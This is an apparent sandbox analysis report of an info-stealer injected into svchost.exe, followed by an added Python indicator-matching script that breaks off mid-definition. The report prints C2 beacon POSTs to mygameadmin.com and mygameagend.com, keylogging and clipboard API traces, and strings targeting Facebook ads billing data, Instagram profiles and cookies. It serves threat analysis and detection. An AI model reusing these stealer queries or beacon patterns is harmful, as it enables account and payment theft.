Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D5E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,14_2_0000024B7D0D5E30
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0EAE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,14_2_0000024B7D0EAE60
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D57B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_0000024B7D0D57B0
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D49FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,14_2_0000024B7D0D49FF
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D7A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,14_2_0000024B7D0D7A20
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D4AE3 FindFirstFileW,FindClose,14_2_0000024B7D0D4AE3
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D63F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,14_2_0000024B7D0D63F0
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D110478 FindFirstFileExA,14_2_0000024B7D110478
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D4B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,14_2_0000024B7D0D4B90
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E17874AE3 FindFirstFileW,FindClose,16_2_0000012E17874AE3
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E178749FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,16_2_0000012E178749FF
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E17877A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,16_2_0000012E17877A20
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E178757B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,16_2_0000012E178757B0
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E17875E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,16_2_0000012E17875E30
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E1788AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,16_2_0000012E1788AE60
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E178B0478 FindFirstFileExA,16_2_0000012E178B0478
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E178763F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,16_2_0000012E178763F0
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E17874B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,16_2_0000012E17874B90
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E19805CF4 FindFirstFileExA,16_2_0000012E19805CF4
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E19823D90 FindFirstFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,16_2_0000012E19823D90
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E198EB2F0 FindFirstFileW,FreeEnvironmentStringsW,GetCommandLineA,16_2_0000012E198EB2F0
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F3384B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,17_2_00000204F3384B90
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F33863F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,17_2_00000204F33863F0
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F33C0478 FindFirstFileExA,17_2_00000204F33C0478
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F3384AE3 FindFirstFileW,FindClose,17_2_00000204F3384AE3
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F33849FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,17_2_00000204F33849FF
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F3387A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,17_2_00000204F3387A20
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F33857B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_00000204F33857B0
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F3385E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,17_2_00000204F3385E30
Source: C:\Windows\System32\svchost.exe Code function: 17_2_00000204F339AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,17_2_00000204F339AE60

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1948 DNS zone transfer UDP 192.168.2.3:60785 -> 34.64.183.91:53
Source: Traffic Snort IDS: 1948 DNS zone transfer UDP 192.168.2.3:53947 -> 34.64.183.91:53
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\svchost.exe Domain query: toa.mygametoa.com
Source: global traffic HTTP traffic detected: POST /report7.4.php HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 | Host: bh.mygameadmin.com | Content-Length: 278 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /report7.4.php HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 | Host: fg.mygameagend.com | Content-Length: 278 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /report7.4.php HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 | Host: bh.mygameadmin.com | Content-Length: 278 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /report7.4.php HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 | Host: bh.mygameadmin.com | Content-Length: 558 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /report7.4.php HTTP/1.1 | Accept: */* | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 | Host: bh.mygameadmin.com | Content-Length: 254 | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 208.95.112.1
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exehttp://support.app
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: svchost.exe, 00000010.00000003.423921823.0000012E176DB000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.533396950.00000204F3000000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: svchost.exe, 00000011.00000002.533096417.00000204EFAAD000.00000004.00000001.sdmp String found in binary or memory: http://crl.ver)
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exerequires_authorizationstatus
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_ushttp://service.real.com/realplayer/secu
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: svchost.exe String found in binary or memory: http://ip-api.com/json/?fields=8198
Source: svchost.exe, 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp String found in binary or memory: http://ip-api.com/json/?fields=8198countryCoderegionquerymachineidipverchannelid8.9mverp=https://bh.
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr String found in binary or memory: http://repository.certum.pl/cscasha2.cer0
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr String found in binary or memory: http://subca.ocsp-certum.com01
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://support.apple.com/kb/HT203092
Source: is-30MA7.tmp.11.dr, is-UKPSI.tmp.11.dr String found in binary or memory: http://w.ijg.
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.dr String found in binary or memory: http://www.certum.pl/CPS0
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://www.google.com/earth/explore/products/plugin.htmlWe
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmp String found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chromedisplayurl
Source: svchost.exe, 00000022.00000000.396013694.00000202B1A76000.00000004.00000001.sdmp, svchost.exe, 00000022.00000000.394067819.00000202B1A76000.00000004.00000001.sdmp String found in binary or memory: https:///WAB-23B4D62B-952A-47E7-969C-B95DBF145D3D.local
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp String found in binary or memory: https:///live.com
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp String found in binary or memory: https:///windows.net
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https:///xboxlive.com
Source: svchost.exe, 00000010.00000002.816396441.0000012E176C2000.00000004.00000001.sdmpString found in binary or memory: https://bh.mygameadmin.com/
Source: svchost.exeString found in binary or memory: https://bh.mygameadmin.com/report7.4.php
Source: svchost.exe, 00000010.00000002.816396441.0000012E176C2000.00000004.00000001.sdmpString found in binary or memory: https://bh.mygameadmin.com/report7.4.phpile
Source: svchost.exe, 00000010.00000002.828608076.0000012E1962A000.00000004.00000001.sdmpString found in binary or memory: https://fg.mygameagend.com/
Source: svchost.exe, 00000010.00000002.828608076.0000012E1962A000.00000004.00000001.sdmpString found in binary or memory: https://fg.mygameagend.com/dll
Source: svchost.exeString found in binary or memory: https://fg.mygameagend.com/report7.4.php
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drString found in binary or memory: https://jrsoftware.org/
Source: MSIFBC3.tmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: MSIFBC3.tmp, 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, 6rfyiAq0nM.msiString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drString found in binary or memory: https://jrsoftware.org0
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp, svchost.exe, 00000022.00000000.396013694.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp, svchost.exe, 00000022.00000002.812144840.00000202B1A5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
Source: svchost.exe, 00000022.00000000.396013694.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmp, svchost.exe, 00000022.00000000.395963998.00000202B1A5D000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/7E5B
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.netB7E5B
Source: svchost.exe, 00000022.00000000.395963998.00000202B1A5D000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.netll
Source: svchost.exe, 00000022.00000000.394067819.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.netm
Source: svchost.exe, 00000010.00000003.421876578.0000012E1764D000.00000004.00000001.sdmpString found in binary or memory: https://p-api.com/json/?fields=8198
Source: svchost.exeString found in binary or memory: https://pcbmhome.com/click.php?cnv_id=%s&cl=%d
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drString found in binary or memory: https://sectigo.com/CPS0D
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divxvideo/x-matroskavideo/divx
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flashapplication/futuresplashapplication/x-shockwave-fla
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_javaapplication/x-java-appletapplication/x-java-applet;j
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdfapplication/pdfapplication/vnd.adobe.x-marsapplicatio
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktimeapplication/sdpapplication/x-mpegapplication/x-
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_realaudio/vnd.rn-realaudiovideo/vnd.rn-realvideoaudio/x-
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwaveapplication/x-director
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmpWindows
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: MSIFBC3.tmp, 0000000B.00000003.295234957.0000000003530000.00000004.00000001.sdmp, _isdecmp.dll.11.drString found in binary or memory: https://www.certum.pl/CPS0
Source: MSIFBC3.tmp, MSIFBC3.tmp, 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, MSIFBC3.tmp.10.drString found in binary or memory: https://www.innosetup.com/
Source: svchost.exeString found in binary or memory: https://www.instagram.com/accounts/edit/
Source: MSIFBC3.tmp, MSIFBC3.tmp.10.drString found in binary or memory: https://www.remobjects.com/ps
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
Source: svchost.exe, 00000022.00000000.396013694.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com-969C-B95DBF145D3D.local
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
Source: svchost.exe, 00000022.00000002.812792444.00000202B1A76000.00000004.00000001.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com2
Source: unknownDNS traffic detected: queries for: toa.mygametoa.com
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ECDFF0 recv,SetLastError,GetLastError,WSAGetLastError,13_2_04ECDFF0
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: Facebook Video Callinghttps://www.facebook.com/chat/video/videocalldownload.phpWe do not track version information for the Facebook Video Calling Plugin.requires_authorizationcomment equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
Source: svchost.exe, 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing""token":"async_get_token":""ACCOUNT_ID":""USER_ID":"{"adAccountID":"{access_token:"{"sessionID":"account_currency_ratio_to_usd:https://www.facebook.com/ajax/settings/account/email.php?__a=1&fb_dtsg_ag=@@https://www.facebook.com/profile.php"displayable_count":"section_type":"FRIENDS"__a=1&fb_dtsg=https://www.facebook.com/personal_settings/page_items/for (;;);payloaditemsfb_dtsg=&variables=%7B%22pagination%22%3A%7B%22after%22%3A%220%22%2C%22num_items%22%3A3%7D%2C%22query_params%22%3A%7B%22payment_type%22%3A%22FBPAY_HUB%22%7D%7D&server_timestamps=true&doc_id=3475732812534491https://secure.facebook.com/api/graphql/datapayment_method_infoavailable_payment_optionscc_typeCREDIT_CARD__a=1&av=&__user=&fb_dtsg=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=AccountQualityHubAssetOwnerViewQuery&variables={"assetOwnerId":"","startTime":1612137600}&doc_id=3739963982749339https://www.facebook.com/api/graphql/viewerDatadefault_businessnodeshttps://www.facebook.com/adsmanager/manage/accounts?act="adtrust_dsl":av=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BillingAMNexusRootQuery&variables={"paymentAccountID":""}&doc_id=4075226092554060billable_account_by_payment_accountaccount_statusDISABLEDACTIVEbalanceformattedbillable_account_tax_infobusiness_country_codecurrencystored_balance_statusprepay_account_balancebilling_threshold_currency_amountformatted_amountbilling_payment_accountbilling_payment_methodscredential__typenameExternalCreditCardPaymentPaypalBillingAgreementStoredBalanceExtendedCredit&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=AccountQualityHubLandingPageQuery&doc_id=3953057938071449viewerad_accountsadvertising_restriction_infois_restrictedrestriction_daterestriction_typeaccount_user&variables=%7B%22paymentAccountID%22%3A%22%22%2C%22count%22%3A10%
2C%22cursor%22%3Anull%2C%22filters%22%3A%5B%5D%2C%22start_time%22%3A1281628800%2C%22end_time%22%3A1630425600%7D&&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BillingTransactionTableQuery&doc_id=5015578711817965billing_txnsedgesflow=logged_in_settings&reload=1&__a=1&__user=https://www.facebook.com/login/device-based/turn-on/00000000000000000000000000000000SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}2https://pcbmhome.com/click.php?cnv_id=%s&cl=%dfacebook.comkernel32.dllRtlGetNtVersionNumbersntdll.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%sInstallLocation\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\%sGoogle ChromeMicrosoft EdgeYandexBrowserSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\UninstallLauncher.exehttps://www.instagram.com/accounts/edit/"viewerId":""username":""email":""phone_number":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36HTTP/1.0Cookie: equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/adsmanager/manage/accounts?act= equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/ajax/settings/account/email.php?__a=1&fb_dtsg_ag= equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/api/graphql/ equals www.facebook.com (Facebook)
Source: svchost.exe, 00000010.00000003.421707940.0000012E1967C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/login/device-based/turn-on/ equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/personal_settings/page_items/ equals www.facebook.com (Facebook)
Source: svchost.exeString found in binary or memory: https://www.facebook.com/profile.php equals www.facebook.com (Facebook)
Source: svchost.exe, 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmpString found in binary or memory: https://www.facebook.comPragma: no-cache equals www.facebook.com (Facebook)
Source: unknownHTTP traffic detected: POST /report7.4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36Host: bh.mygameadmin.comContent-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EBB820 GetAsyncKeyState,Sleep,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,13_2_04EBB820
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB74A0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_04EB74A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB7500 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalSize,GlobalUnlock,CloseClipboard,13_2_04EB7500
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB6590 CreateEventW,OpenDesktopW,CreateDesktopW,SetThreadDesktop,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplaySettingsW,GetDC,CreateCompatibleDC,GetVersionExA,13_2_04EB6590
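The report above gives everything needed to hunt for this sample in web-proxy logs: the geolocation check against http://ip-api.com/json/?fields=8198, the beacon POST to /report7.4.php on bh.mygameadmin.com, the fallback domain fg.mygameagend.com, the DNS query for toa.mygametoa.com, the pcbmhome.com click tracker and the fixed Chrome/94 User-Agent. The following Python is an added example, not code from the Joe Sandbox report or from the sample; the proxy log format and the log lines are constructed for it. The ip-api.com field bit values are an assumption taken from that service's public documentation; the report's own string "countryCoderegionquery" immediately after fields=8198 agrees with 2 + 4 + 8192.

```python
"""Match this sample's network indicators against proxy log lines.

Added example, not part of the Joe Sandbox report. Log format and sample
lines are constructed; ip-api.com field bits are an assumption from its docs.
"""
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Hosts and paths copied from the strings and traffic listed in the report.
C2_HOSTS = {"bh.mygameadmin.com", "fg.mygameagend.com", "toa.mygametoa.com", "pcbmhome.com"}
C2_PATHS = {"/report7.4.php", "/dll", "/click.php"}

# The fixed User-Agent the sample sends. It is a genuine Chrome 94 string, so it
# only corroborates a hit and never raises one on its own.
SAMPLE_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36")

# ip-api.com numeric 'fields' flags (assumption: values as documented by the service).
IPAPI_FIELDS = {
    "country": 1, "countryCode": 2, "region": 4, "regionName": 8, "city": 16,
    "zip": 32, "lat": 64, "lon": 128, "timezone": 256, "isp": 512, "org": 1024,
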